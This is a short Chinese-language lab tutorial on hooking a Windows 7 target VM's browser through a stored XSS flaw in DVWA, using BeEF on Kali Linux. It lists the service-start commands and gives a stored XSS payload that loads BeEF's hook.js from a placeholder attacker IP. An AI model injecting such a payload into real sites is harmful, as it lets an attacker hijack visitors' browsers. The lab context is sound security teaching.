利用XSS漏洞对靶机进行控制_方便xss攻击的windows靶机

利用XSS漏洞对靶机进行控制管理

一、使用工具：

1. Kali Linux 虚拟机（攻击机）
2. Windows 7 虚拟机（靶机）
3. DVWA（需要安装在攻击机中）
4. BeEF （需要安装在攻击机中，一般Kali Linux有自带）

二、具体步骤：

1. 在Kali Linux中输入以下代码，打开MySQL和Apache2服务

service mysql start            #开启mysql服务
1

service apache2 start          #开启Apache2服务
1

2. 在Kali Linux中输入以下代码进行打开BeEF，并将UI URL中的链接复制到浏览器中打开，登录BeEF（BeEF默认账号密码均是beef）

cd /usr/share/beef-xss/ 
./beef                       #打开BeEF
1
2

3. 在Kali Linux中打开浏览器进入DVWA中，将安全等级调成低

3. 然后进入存储型XSS中，使用浏览器自带的元素检查进行修改XSS输入框的限制（可以修改成宽度60，最大4行，最多可输入500字）
   

4. 将以下代码复制到XSS输入框中，并点击上传

<script src="http://攻击机IP:3000/hook.js"></scriipt>
1

5. 在靶机中登录到攻击机的DVVWA

6. 此时可以看到攻击机中的BeEF中靶机上线